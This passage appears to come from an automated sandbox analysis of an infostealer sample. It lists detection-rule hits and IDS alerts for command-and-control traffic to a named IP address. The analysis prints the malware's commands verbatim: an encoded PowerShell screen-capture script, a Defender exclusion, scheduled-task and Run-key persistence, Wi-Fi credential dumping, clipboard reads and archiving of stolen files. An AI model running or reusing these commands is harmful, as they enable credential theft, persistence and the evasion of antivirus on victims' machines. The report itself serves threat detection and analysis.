QBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\word.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\bound.exe, ProcessId: 7280, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\word
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tuy1nspn\tuy1nspn.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tuy1nspn\tuy1nspn.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKA
                      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\sB2ClgrGng.exe", ParentImage: C:\Users\user\Desktop\sB2ClgrGng.exe, ParentProcessId: 2892, ParentProcessName: sB2ClgrGng.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 7872, ProcessName: cmd.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sB2ClgrGng.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sB2ClgrGng.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\sB2ClgrGng.exe", ParentImage: C:\Users\user\Desktop\sB2ClgrGng.exe, ParentProcessId: 2892, ParentProcessName: sB2ClgrGng.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sB2ClgrGng.exe'", ProcessId: 4248, ProcessName: cmd.exe
                      Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\Desktop\sB2ClgrGng.exe, ProcessId: 2892, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
                      Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\sB2ClgrGng.exe, ProcessId: 2892, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "word" /tr "C:\Users\user\AppData\Roaming\word.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "word" /tr "C:\Users\user\AppData\Roaming\word.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: bound.exe, ParentImage: C:\Users\user\AppData\Local\Temp\bound.exe, ParentProcessId: 7280, ParentProcessName: bound.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "word" /tr "C:\Users\user\AppData\Roaming\word.exe", ProcessId: 7076, ProcessName: schtasks.exe
                      Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
                      Source: Process startedAuthor: frack113: Data: Command: shutdown.exe /f /s /t 0, CommandLine: shutdown.exe /f /s /t 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\shutdown.exe, NewProcessName: C:\Windows\System32\shutdown.exe, OriginalFileName: C:\Windows\System32\shutdown.exe, ParentCommandLine: bound.exe, ParentImage: C:\Users\user\AppData\Local\Temp\bound.exe, ParentProcessId: 7280, ParentProcessName: bound.exe, ProcessCommandLine: shutdown.exe /f /s /t 0, ProcessId: 8592, ProcessName: shutdown.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "word" /tr "C:\Users\user\AppData\Roaming\word.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "word" /tr "C:\Users\user\AppData\Roaming\word.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: bound.exe, ParentImage: C:\Users\user\AppData\Local\Temp\bound.exe, ParentProcessId: 7280, ParentProcessName: bound.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "word" /tr "C:\Users\user\AppData\Roaming\word.exe", ProcessId: 7076, ProcessName: schtasks.exe
                      Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\sB2ClgrGng.exe, ProcessId: 2892, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
                      Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8556, TargetFilename: C:\Users\user\AppData\Local\Temp\tuy1nspn\tuy1nspn.cmdline
                      Source: Process startedAuthor: Timur Zinniatullin, E.M. Anhaus, oscd.community: Data: Command: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe a -r -hp"newgen" "C:\Users\user\AppData\Local\Temp\mVQsx.zip" *, CommandLine: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe a -r -hp"newgen" "C:\Users\user\AppData\Local\Temp\mVQsx.zip" *, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe a -r -hp"newgen" "C:\Users\user\AppData\Local\Temp\mVQsx.zip" *", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5592, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe a -r -hp"newgen" "C:\Users\user\AppData\Local\Temp\mVQsx.zip" *, ProcessId: 7600, ProcessName: rar.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sB2ClgrGng.exe', CommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sB2ClgrGng.exe', CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sB2ClgrGng.exe'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4248, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sB2ClgrGng.exe', ProcessId: 7188, ProcessName: powershell.exe
                      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7336, ProcessName: svchost.exe

                      Data Obfuscation

                      barindex
                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tuy1nspn\tuy1nspn.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tuy1nspn\tuy1nspn.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKA

                      Stealing of Sensitive Information

                      barindex
                      Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\sB2ClgrGng.exe", ParentImage: C:\Users\user\Desktop\sB2ClgrGng.exe, ParentProcessId: 2892, ParentProcessName: sB2ClgrGng.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", ProcessId: 8056, ProcessName: cmd.exe
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-13T19:01:24.479459+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:01:29.477991+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:01:34.477345+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:01:38.262957+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:01:39.383490+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:01:39.477201+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:01:44.477352+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:01:49.477446+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:01:53.095707+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:01:54.477904+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:01:59.597150+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:02:04.480484+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:02:07.939520+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:02:09.399936+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:02:09.531652+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:02:14.476395+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:02:19.477476+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:02:22.782245+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:02:24.475901+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:02:28.830663+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:02:29.476294+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:02:34.476312+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:02:39.411926+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
                      2024-10-13T19:02:39.501106+020028528701Malware Command and Control Activity Detected198.23.219.1047000192.168.2.449739TCP
